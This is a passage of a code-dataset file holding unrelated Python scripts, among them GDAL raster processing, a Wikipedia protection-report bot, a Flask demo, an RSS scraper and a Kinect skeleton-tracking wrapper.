out_ds.RasterCount):\r\n out_band = out_ds.GetRasterBand(c)\r\n no_data = out_band.GetNoDataValue()\r\n values = out_band.ReadAsArray()\r\n if plus is not None:\r\n values[values != no_data] = values[values != no_data] + plus\r\n if multi is not None:\r\n values[values != no_data] = values[values != no_data] * multi\r\n out_band.WriteArray(values)\r\n\r\n\r\ndef deal_others(ras, out_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n # downscaling\r\n gdal.Warp(out_file, ras, options=option)\r\n","sub_path":"deal_test.py","file_name":"deal_test.py","file_ext":"py","file_size_in_byte":8396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268953710","text":"def possible(answer):\n for x, y, stuff in answer:\n if stuff == 0: # pillar\n if y == 0 or [x-1,y,1] in answer or [x,y,1] in answer or [x,y-1,0] in answer:\n # on the floor, on one side of ceiling or on another pillar\n continue\n return False\n elif stuff == 1:\n if [x,y-1,0] in answer or [x+1,y-1,0] in answer or ([x-1, y,1] in answer and [x+1,y,1] in answer):\n continue\n return False\n return True\n\ndef solution(n, build_frame):\n answer = []\n for frame in build_frame:\n x, y, stuff, operate = frame\n if operate == 0:\n answer.remove([x,y,stuff])\n if not possible(answer):\n answer.append([x,y,stuff])\n if operate == 1:\n answer.append([x,y,stuff])\n if not possible(answer):\n answer.remove([x,y,stuff])\n return sorted(answer)\n\n\n","sub_path":"implementaion/implementation_tests/12_construction(mod).py","file_name":"12_construction(mod).py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170405814","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author: Dominik Gresch \n# Date: 10.04.2015 11:00:57 CEST\n# File: uc.py\n\nfrom .atoms import Elements\n\nimport numpy as np\nimport mayavi.mlab as ml\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef plot(uc, radius_type='crystal', **elements):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n for i in range(3):\n ml.plot3d([0, uc[i][0]], [0, uc[i][1]], [0, uc[i][2]], color=(1, 0, 0))\n for j in range(3):\n if(i != j):\n 
ml.plot3d([uc[j][0], uc[j][0] + uc[i][0]],\n [uc[j][1], uc[j][1] + uc[i][1]],\n [uc[j][2], uc[j][2] + uc[i][2]], color=(0, 0, 1))\n for k in range(3):\n if(i != k and j != k):\n ml.plot3d([uc[k][0] + uc[j][0], uc[k][0] + uc[j][0] + uc[i][0]],\n [uc[k][1] + uc[j][1], uc[k][1] + uc[j][1] + uc[i][1]],\n [uc[k][2] + uc[j][2], uc[k][2] + uc[j][2] + uc[i][2]], color=(0, 0, 1))\n ax.set_xlim(0, uc[0][0])\n ax.set_ylim(0, uc[1][1])\n ax.set_zlim(0, uc[2][2])\n\n for el, pos in elements.items():\n element = Elements[el]\n size = element[radius_type + '_r']\n color = tuple(x / 256. for x in element.color)\n for coord in pos:\n cartesian = sum(((coord[j] + 1) % 1) * uc[j] for j in range(3))\n ml.points3d([cartesian[0]], [cartesian[1]], [cartesian[2]], scale_factor=size, color=color, resolution=20)\n \n ml.show()\n","sub_path":"phys/uc.py","file_name":"uc.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194373390","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport pymysql\n\nos.environ['PYWIKIBOT_DIR'] = os.path.dirname(os.path.realpath(__file__))\nimport pywikibot\n\nfrom config import config_page_name, database # pylint: disable=E0611,W0614\n\n\nos.environ['TZ'] = 'UTC'\n\nsite = pywikibot.Site()\nsite.login()\n\nconfig_page = pywikibot.Page(site, config_page_name)\ncfg = config_page.text\ncfg = json.loads(cfg)\nprint(json.dumps(cfg, indent=4, ensure_ascii=False))\n\nif not cfg['enable']:\n exit('disabled\\n')\n\noutputPage = pywikibot.Page(site, cfg['output_page_name'])\n\ntable = (\n '{| class=\"wikitable sortable\"'\n '\\n|-'\n '\\n! 頁面 !! 引用數 !! 編輯保護 !! 移動保護 !! 重定向 !! 備註'\n)\n\n\ndb = pymysql.connect(host=database['host'],\n user=database['user'],\n passwd=database['passwd'],\n db=database['db'],\n charset=database['charset'])\ncur = db.cursor()\n\ncur.execute(\"\"\"SELECT `title`, `count`, `protectedit`, `protectmove`, `redirect` FROM `MostTranscludedPages_page` ORDER BY `count` DESC\"\"\")\nrows = cur.fetchall()\n\ncountsysop = 0\ncountautoconfirmed = 0\nfor row in rows:\n title = row[0]\n count = row[1]\n protectedit = row[2]\n protectmove = row[3]\n redirect = row[4]\n comment = ''\n\n if count >= 5000:\n if protectedit != 'sysop':\n comment = '[{{{{fullurl:{0}|action=protect&mwProtect-level-edit=sysop&mwProtect-level-move=sysop&mwProtect-reason=高風險模板:{1}引用}}}} 需要全保護]'.format(\n title, count)\n countsysop += 1\n elif count >= 500:\n if protectedit == '' and not title.startswith('模块:'):\n comment = '[{{{{fullurl:{0}|action=protect&mwProtect-level-edit=autoconfirmed&mwProtect-level-move=autoconfirmed&mwProtect-reason=高風險模板:{1}引用}}}} 需要半保護]'.format(\n title, count)\n countautoconfirmed += 1\n\n table += '\\n|-\\n| [[{0}]] || {1} || {2} || {3} || {4} || {5}'.format(\n title, count, protectedit, protectmove, redirect, comment\n )\n\ntable += '\\n|}'\n\noutput = \"\"\"* {0}個頁面需要全保護\n* {1}個頁面需要半保護\n{2}\n\"\"\".format(countsysop, countautoconfirmed, table)\n\noutputPage.text = output\noutputPage.save(summary=cfg['summary'])\n","sub_path":"MostTranscludedPages/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"212781265","text":"\"\"\"\nПользователь вводит месяц в виде целого числа от 1 до 12.\nСообщить к какому времени года относится месяц (зима, весна, лето, осень).\nНапишите решения через list и через dict.\n\"\"\"\n# Словарь с месяцем и соотвествующим временем 
года\nseasons_dict = {\n 1: \"Зима\",\n 2: \"Зима\",\n 3: \"Весна\",\n 4: \"Весна\",\n 5: \"Весна\",\n 6: \"Лето\",\n 7: \"Лето\",\n 8: \"Лето\",\n 9: \"Осень\",\n 10: \"Осень\",\n 11: \"Осень\",\n 12: \"Зима\",\n}\n\n# Ввод пользователем номера месяца\nuser_number = input(\"Введите месяц в виде целого числа от 1 до 12 - \")\n\n# Проверка корректности ввода пользователем\nif user_number.isdigit():\n # Если ввод корректный.\n # Вывод времени года соответствующему номеру месяца\n user_number = int(user_number)\n print(f\"Месяц №{user_number} относится к времени года - \"\n f\"{seasons_dict[user_number]}\")\nelse:\n # Если ввод некорректный\n print(\"Вы ввели не число. Необходимо ввести число.\")\n\n\n\n\n\n","sub_path":"Урок 2. Встроенные типы и операции с ними/Homework#2.3_dict.py","file_name":"Homework#2.3_dict.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"541944230","text":"import yaml\nimport os\n\npardir = os.path.dirname(__file__)\nconfig_path = pardir + '/../config/config.yaml'\n\nclass ReadConfig():\n def __init__(self, yaml_file = config_path):\n self.yaml_file = yaml_file\n self.configs = self._read_yaml()\n\n def _read_yaml(self):\n with open(self.yaml_file, encoding='utf-8') as f:\n config_dict = yaml.load(stream=f.read(), Loader=yaml.FullLoader)\n return config_dict\n\n def config(self, path):\n list_path = path.split('.')\n try:\n if len(list_path) < 1:\n print('参数错误!')\n elif len(list_path) == 1:\n return self.configs[list_path[0]]\n else:\n return self.configs[list_path[0]][list_path[1]]\n except:\n print('请检查参数路径是否正确:%s'%path)\n\n\n def write_yaml(self):\n with open(self.yaml_file, mode='a', encoding='utf-8') as f:\n data = {'name4':'张崇垚'}\n # allow_unicode=True 可写入中文\n yaml.dump(data, stream=f, allow_unicode=True)\n\nif __name__ == '__main__':\n read_config = ReadConfig()\n print(read_config.config('database.hostname.user'))\n\n # print(config_path)\n # read_config.config('2.3')\n # read_config.config('database.port')\n # read_config.write_yaml()","sub_path":"utils/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"495150136","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread(\"cv_ss_0.png\",0)\r\n\r\n#dimensions = img.shape\r\nI = np.zeros((1,255))\r\n\r\na = 0\r\nb = 0\r\n\r\ni = img.shape[1]\r\nj = img.shape[0]\r\ncuml = 0\r\n#print(i)\r\n#print(j)\r\n\r\n#print(img[0,0])\r\n \r\nfin_img = img\r\n\r\nwhile (a=i*j/2:\r\n break\r\n ctr = ctr + 1\r\n\r\na = 0\r\nb = 0\r\n\r\nprint(cuml)\r\nprint(ctr)\r\n\r\ncv2.imshow('image', img)\r\n\r\nblk = 0\r\nwht = 0\r\n\r\nwhile (actr):\r\n fin_img[b,a] = 255\r\n blk = blk + 1\r\n b = b + 1\r\n a = a + 1\r\n b = 0\r\n\r\ncv2.imshow('50-50 image', fin_img)\r\n\r\nprint(wht)\r\nprint(blk)\r\n\r\ncv2.waitKey(0)\r\n\r\ncv2.imwrite('Prob4_1.png', fin_img)\r\n\r\n\"\"\" a = 0\r\nimg2 = img\r\n\r\nwhile (a=128 and img[b,a]<192)):\r\n img2[b,a] = 0\r\n elif ((img[b,a]>64 and img[b,a]<128) or (img[b,a]>=192 and img[b,a]<=255)):\r\n img2[b,a] = 255\r\n b = b + 1\r\n a = a + 1\r\n b = 0\r\n \"\"\"\r\ncv2.imshow('final image', img2)\r\n\r\ncv2.waitKey(0)\r\n\r\n#hist = cv2.calcHist([img],[0],None,[256],[0,256])\r\n\r\n#plt.hist(img.ravel(),256,[0,256]); 
plt.show()","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"431353531","text":"import pymongo\nimport power_analysis_day\nfrom datetime import datetime\nfrom random import randint\n\npad = power_analysis_day\n#client = pymongo.MongoClient(\"localhost\", 27017)\n#db = client.test\n\n\ndef main():\n\n\t# Original method\n\tjob = {\n\t \"energyhubid\": \"78:a5:04:ff:40:bb\",\n\t \"starttime\": datetime(2016,10,1,0,0,0),\n\t \"endtime\": datetime(2016,10,2,0,0,0),\n\t \"userid\": \"testuser\",\n\t \"resultsid\":\"ABCD\" + str(randint(0,1000)),\n\t \"analysismodel\":\"DAILYPOWER\",\n\t \"jobstatus\":0\n\t}; \n\n\t##pad.mdb_insert_poweranalysisday_job(job)\n\t##data = pad.mdb_get_energy_counter_data_grouped(job)\n\t##base_values = []\n\t##hub_aggr = pad.get_energy_counter_aggregate(data, base_values)\n\t##print(\"------------------------------\")\n\t##print(list(hub_aggr))\n\n\n\t# New method\n\tdata = pad.mdb_get_energy_counter_data_new(job)\n\tbase_values = []\n\n\thug_aggr = pad.get_energy_counter_aggregate_new(data, base_values)\n\t\n\tprint(list(hug_aggr))\n\t##print(\"------------------------------\")\n\t##print(data)\n\t\n\n\t\"\"\"\n{\n \"energyhubid\": \"78:a5:04:ff:40:bb\",\n \"starttime\": \"2016-10-01T04:00:00.000Z\",\n \"endtime\": \"2016-10-01T09:00:00.000Z\",\n \"userid\": \"845\"\n}\n\"\"\"\n#print(db.poweranalysishour_jobs.insert_one(job).inserted_id)\n\n\n#print(db.name)\n#print(db.test_poweranalysisday_jobs)\n#print(db.test_poweranalysisday_jobs.insert_one({\"x\": 8}).inserted_id)\n#print(db.test_poweranalysisday_jobs.find_one())\n\n#date = \"2016-10-18 00:00:00\"\n#datestr = datetime.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n#print(datestr)\n#date2 = \"2016-10-18 23:00:00\"\n#date2str = datetime.strptime(date2, \"%Y-%m-%d %H:%M:%S\")\n#print(date2str)\n#print(\"Hello you handsome devil!\")\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","sub_path":"vivi_testing.py","file_name":"vivi_testing.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360261760","text":"# tmplt_variables.py\n'''\nCommand to create virtual environment 'env' for this flask app : \n python -m venv env \n\nCommand to activate the virtual environment 'env' :\n env\\Scripts\\activate.bat \n\nCommand to install flask :\n pip install flask \n\nCommand to set the flask-DEBUG environment variable on :\n set FLASK_DEBUG=1\n\nCommand to run this flask app:\n python tmplt_variables.py\n\nCommand to Deactivate the virtual environment 'env' :\n deactivate \n'''\n\nfrom flask import Flask, jsonify, request, redirect, url_for, session, render_template\n\napp = Flask(__name__) \napp.config['DEBUG'] = True\napp.config['SECRET_KEY'] = 'somesecrettosignthecookiewith'\n\n@app.route('/')\ndef index():\n session.pop('name', None)\n return '
<h1>Hello!</h1>
'\n\n@app.route('/home', methods=['GET'], defaults={'name': 'Default Name'})\n@app.route('/home/', methods=['POST', 'GET'])\ndef home(name):\n session['name'] = name\n return render_template (\n 'home.html', \n name=name, \n display=True,\n mylist=['one', 'two', 'three', 'four'],\n listofdicts=[{'name': 'Zach'}, {'name': 'Zoe'}]\n )\n # return '
<h1>Hello {}! You are on the HOME page!</h1>
'.format(name)\n\n@app.route('/json')\ndef json():\n if 'name' in session:\n name = session['name']\n else:\n name = 'NotInSession!'\n return jsonify({'key': 'value', 'key2': [1, 2, 3], 'name': name})\n\n@app.route('/query')\ndef query():\n query_name = request.args.get('name')\n query_location = request.args.get('location')\n return '
<h1>Hello {} from {}! You are on the QUERY page!</h1>
'.format(query_name, query_location)\n\n@app.route('/theform', methods=['GET', 'POST'])\ndef theform():\n if request.method == 'GET':\n return render_template('form.html')\n else:\n form_name = request.form['name']\n form_location = request.form['location']\n # return redirect(url_for('home'))\n return redirect(url_for('home', name=form_name, location=form_location))\n\n'''\n@app.route('/theform', methods=['POST'])\ndef process():\n form_name = request.form['name']\n form_location = request.form['location']\n return 'Hi {} from {}, you have submitted the form successfully!'.format(form_name, form_location)\n'''\n\n@app.route('/processjson', methods=['POST'])\ndef processjson():\n data = request.get_json()\n json_name = data['name']\n json_loc = data['location']\n randomlist = data['randomlist']\n return jsonify({'result': 'Success!',\n 'name': json_name,\n 'location': json_loc,\n 'randomkeyinlist': randomlist[1],\n })\n\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n","sub_path":"tmplts/tmplt_variables.py","file_name":"tmplt_variables.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293002636","text":"from random import choice\nimport string\nfrom tabulate import tabulate\nfrom operator import itemgetter\nfrom pprint import pprint\n\n# empty list for holding devices\ndevices = list()\n\n# add comment\n\n# for loop to create large number of devices\nfor index in range(1,101):\n # create device dictionary\n device = dict()\n\n # random device name\n device[\"name\"] = (\n choice([\"r2\", \"r3\", \"r4\", \"r6\", \"r10\"])\n + choice([\"L\", \"U\"])\n + choice(string.ascii_letters)\n )\n\n # random vendor from choice of Cisco, Juniper, Arista\n device[\"vendor\"] = choice([\"Cisco\", \"Juniper\", \"Arista\"])\n if device[\"vendor\"] == \"Cisco\":\n device[\"os\"] = choice([\"ios\" , \"iosxe\", \"iosxr\", \"nxos\"])\n device[\"version\"] = choice([\"12.1(T)\", \"7.0.3.9\", \"14.07X\", \"20.45\"])\n elif device[\"vendor\"] == \"Juniper\":\n device[\"os\"] = \"junos\"\n device[\"version\"] = choice([\"J6.23.1\", \"8.43.12\", \"6.45\", \"6.03\"])\n elif device[\"vendor\"] == \"Arista\":\n device[\"os\"] = \"eos\"\n device[\"version\"] = choice([\"2.45\", \"3.38\"])\n \n # assign IP Address\n device[\"ip\"] = \"10.0.0.\" + str(index)\n\n print()\n for key,value in device.items():\n print(f\"{key:>16s} : {value}\")\n\n # add the device to the list of devices\n devices.append(device)\n\n\n\n# use pprint to print data as-is\nprint(\"\\n_______ Pretty Print _______\")\npprint(devices)\n\n# use 'tabulate' to print table of devices\nprint(\"\\n_______ Sorted devices in tabular format _______\")\nprint(tabulate(sorted(devices, key=itemgetter(\"vendor\", \"os\", \"version\")),headers=\"keys\"))","sub_path":"52 Weeks of Python/Basics/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528869423","text":"#XML - Xtensible Mark Up language\n#supposed to be legible for humans and machines\n#commonly used in RSS feeds.\n#introduce BeautifulSoup - PYthon module to deal with web scraping.\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\nreq = urllib.request.urlopen('https://abcnews.go.com/abcnews/topstories')\n\n#will default data to Html without XML parameter\nxml = BeautifulSoup(req, features=\"xml\")\n\n\n#print first item twice. 
use [1:] print past first item.\nfor item in xml.findAll('link')[2:]: #findall() parameter is tags [Title, link, etc]\n url = item.text\n news = urllib.request.urlopen(url).read()\n print(news)\n print(20*\"#\")\n#to remove use .text\n\n\n\n\n\n\n\n\n\n\n\n\nprint(\"\\n\\n\\n\\n\\nEngadget:\\n\\n\")\n\nreq = urllib.request.urlopen('https://www.engadget.com/tag/rss/')\nxml = BeautifulSoup(req, features=\"xml\")\n\nfor item in xml.findAll('item'): #findall() parameter is tags [Title, link, etc]\n print(item)\n","sub_path":"Python_Tut_v2/xmltut.py","file_name":"xmltut.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"379260053","text":"'''\r\n-------------------------------------------------------------------------------------------\r\n# Based on the example \"PyKinectBodyGame.py\" provided by PyKinect2\r\n# This code was released under the MIT license:\r\n#\r\n# The MIT License (MIT)\r\n#\r\n# Copyright (c) Microsoft\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n--------------------------------------------------------------------------------------------\r\n# Relevant modifications to the base script made at HEIG-VD are highlighted and/or commented\r\n# Developpers:\r\n# Julien Rebetez\r\n# Eric Henchoz\r\n# Hector Satizabal\r\n# Institute IICT, HEIG-VD 2016\r\n#\r\n# This script employs the quaternions provided by the Kinect2 SDK. Each\r\n# quaternion represents the absolute orientation of its parent bone, e.g.,\r\n# the quaternion at the wrist represents the absolute orientation of the\r\n# lower arm bone. In order to obtain orientations relative to a certain base,\r\n# we pre-multiplied the quaternion by the inverse of the base quaternion,\r\n# e.g., Qwrist-elbow = inv(Qelbow) * Qwrist. Relative orientations were then\r\n# transformed into rotation matrices in order to obtain the Euler angles\r\n# describing the 3 rotations: pitch, roll and yaw. We used the order 'syzx'\r\n# which means that the rotations were done with respect to the static\r\n# reference and they are applied in the following order: (1)pitch around x,\r\n# (2)roll around z and (3)yaw around y. This order matchs the construction\r\n# constaints of the robot. 
The sequence 'syzx' was empirically found by first\r\n# making the two coordinate systems to match (moving the limbs and making\r\n# both bones colinear), and then finding the sequence of axes around wich\r\n# rotations has to be made.\r\n----------------------------------------------------------------------------------------------\r\nCreated on 14/09/2017\r\n\r\n@author: Mk Eng: Francisco Javier Gonzalez Lopez.\r\n\r\nThis wrapper get an image with the Kinect camera, the image is transformed into \r\na RGB format in the main script to show it in the GUI. With the kinect is possible \r\nget the skeleton tracking, and compute the joint's angles to recognize the mood \r\nof the person and \"teach\" to the Robot Pepper body language, also is possible control\r\ndirectly the Robot Pepper.\r\n'''\r\n# Are imported the wrappers that have the methods to get the skeleton joints angles.\r\nimport sys \r\nfrom pykinect2 import PyKinectV2\r\nfrom pykinect2 import PyKinectRuntime\r\nimport ctypes\r\nfrom pygame import color, draw, Surface, surfarray\r\nimport numpy as np\r\nimport cv2\r\nfrom math import pi\r\nimport transformations as tf\r\n\r\n# Is defined a vector that has the parameters to draw the skeleton.\r\nSkeletonColors = [color.THECOLORS[\"green\"], color.THECOLORS[\"red\"]] \r\n\r\n# Is activated the tracking of the wrist.\r\nENABLE_WRIST = True\r\n\r\ndef Add_Angles(alpha, beta):\r\n '''\r\n This function return the add of two angles, getting the result\r\n into the interval [-pi,pi]\r\n '''\r\n Add = alpha + beta\r\n\r\n while np.abs(Add) > (2*pi):\r\n if Add > 0:\r\n Add -= 2*pi\r\n else:\r\n Add += 2*pi \r\n\r\n if Add > pi:\r\n return Add - (2*pi) \r\n elif Add < -pi:\r\n return Add + (2*pi) \r\n else:\r\n return Add \r\n\r\nclass Kinect_Tracking(object):\r\n '''\r\n Wrapper class to use the Kinect V2 Camera to get the skeleton tracking\r\n The current implementation return the eulerian angles (Pitch, Yaw, Roll) \r\n of each bodie's joint: Head, Shoulders, Elbows, Wrist, Hip, Knee; and the \r\n state of the hands (Open-Close)\r\n '''\r\n def __init__(self):\r\n self.Bodies = None\r\n \r\n def Open_Kinect(self): \t # Manual Start of the Kinect V2 Camera. 
\r\n self.Kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body)\r\n self.FrameSurface = Surface((self.Kinect.color_frame_desc.Width, self.Kinect.color_frame_desc.Height), 0, 32)\r\n \r\n def Stop_Kinect(self): # Manual Stop of the Kinect V2 Camera.\r\n self.Kinect.close()\r\n \r\n def DrawColorFrame(self, Frame, TargetSurface):\r\n '''\r\n Function that decode the image get with the Kinect V2 Camera and \r\n convert it in a compatible color image puting it in a pygame's surface.\r\n '''\r\n TargetSurface.lock()\r\n address = self.Kinect.surface_as_array(TargetSurface.get_buffer()) # Function that get the color image and save the frame.\r\n ctypes.memmove(address, Frame.ctypes.data, Frame.size) # C function that return a compatible color image.\r\n del address\r\n TargetSurface.unlock()\r\n \r\n def SelectNearestBody(self):\r\n '''\r\n Function that determined the nearest body in the image get with the \r\n Kinect V2 Camera and return the information of that body.\r\n '''\r\n NearestBody = None\r\n NearestDistance = float('inf')\r\n \r\n for i in range(0, self.Kinect.max_body_count):\r\n Body = self.Bodies.bodies[i] \r\n if not Body.is_tracked: \r\n continue\r\n \r\n Spine = Body.joints[PyKinectV2.JointType_SpineBase].Position # Spine coordinates.\r\n Distance = np.sqrt((Spine.x**2)+(Spine.y**2)+(Spine.z**2)) # Compute the eucledian distance of the body to the Kinect V2 Camera.\r\n\r\n if Distance < NearestDistance:\r\n NearestDistance = Distance\r\n NearestBody = Body\r\n \r\n return NearestBody \r\n\r\n def DrawBody(self, Joints, JointsPoints, Color):\r\n '''\r\n Function that send the parameters get with the Kinect V2 Camera\r\n to draw the skeleton.\r\n '''\r\n # Torso\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_Head, PyKinectV2.JointType_Neck)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_Neck, PyKinectV2.JointType_SpineShoulder)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_SpineMid)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineMid, PyKinectV2.JointType_SpineBase)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipLeft)\r\n \r\n # Right Arm\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ShoulderRight, PyKinectV2.JointType_ElbowRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_WristRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_HandRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HandRight, PyKinectV2.JointType_HandTipRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ThumbRight)\r\n\r\n # Left Arm\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ShoulderLeft, PyKinectV2.JointType_ElbowLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ElbowLeft, 
PyKinectV2.JointType_WristLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_HandLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HandLeft, PyKinectV2.JointType_HandTipLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ThumbLeft)\r\n\r\n # Right Leg\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HipRight, PyKinectV2.JointType_KneeRight);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_AnkleRight);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_FootRight);\r\n\r\n # Left Leg\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HipLeft, PyKinectV2.JointType_KneeLeft);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_AnkleLeft);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_FootLeft);\r\n\r\n def Angles(self, Joints, Orientations, Body, Type):\r\n '''\r\n Function that calculated the joint's angles of the skeleton get with the\r\n Kinect V2 Camera, getting the quaternion matrix and then calculating the\r\n eulerian angles.\r\n\r\n If the skeleton tracking is not correct, complete or parcial, the \r\n corresponding angles are define like \"None\"; after that the angle are \r\n verified, they are saved in the corresponding lists.\r\n ''' \r\n # Hip angles.\r\n if (Joints[PyKinectV2.JointType_SpineShoulder].TrackingState == 2) and (Joints[PyKinectV2.JointType_SpineBase].TrackingState == 2): \r\n ChestQuat = self.Quaternion(Orientations, PyKinectV2.JointType_SpineBase) \r\n HipAngles = tf.euler_from_quaternion(ChestQuat, 'syzx') \r\n \r\n WaistPitch = HipAngles[2]\r\n WaistRoll = HipAngles[1]\r\n \r\n # Right Leg angles.\r\n if (Joints[PyKinectV2.JointType_HipRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_KneeRight].TrackingState == 2):\r\n LegQuat = self.Quaternion(Orientations, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_HipRight )\r\n LegAngles = tf.euler_from_quaternion(LegQuat, 'syzx')\r\n \r\n RHipPitch = LegAngles[2]\r\n RHipRoll = LegAngles[1]\r\n \r\n # Right Knee angles.\r\n if (Joints[PyKinectV2.JointType_AnkleRight].TrackingState == 2):\r\n KneeQuat = self.Quaternion(Orientations, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_KneeRight)\r\n KneeAngles = tf.euler_from_quaternion(KneeQuat, 'syzx')\r\n\r\n RKneeRoll = KneeAngles[1]\r\n RKneeYaw = KneeAngles[0]\r\n \r\n else:\r\n RKneeRoll = None\r\n RKneeYaw = None\r\n \r\n else:\r\n RKneeRoll = None\r\n RKneeYaw = None\r\n\r\n RHipPitch = None\r\n RHipRoll = None\r\n\r\n # Left Leg angles.\r\n if (Joints[PyKinectV2.JointType_HipLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_KneeLeft].TrackingState == 2):\r\n LegQuat = self.Quaternion(Orientations, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_HipLeft)\r\n LegAngles = tf.euler_from_quaternion(LegQuat, 'syzx')\r\n\r\n LHipPitch = LegAngles[2]\r\n LHipRoll = LegAngles[1]\r\n \r\n # Left Knee angles.\r\n if (Joints[PyKinectV2.JointType_AnkleLeft].TrackingState == 2):\r\n KneeQuat = self.Quaternion(Orientations, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_KneeLeft)\r\n KneeAngles = 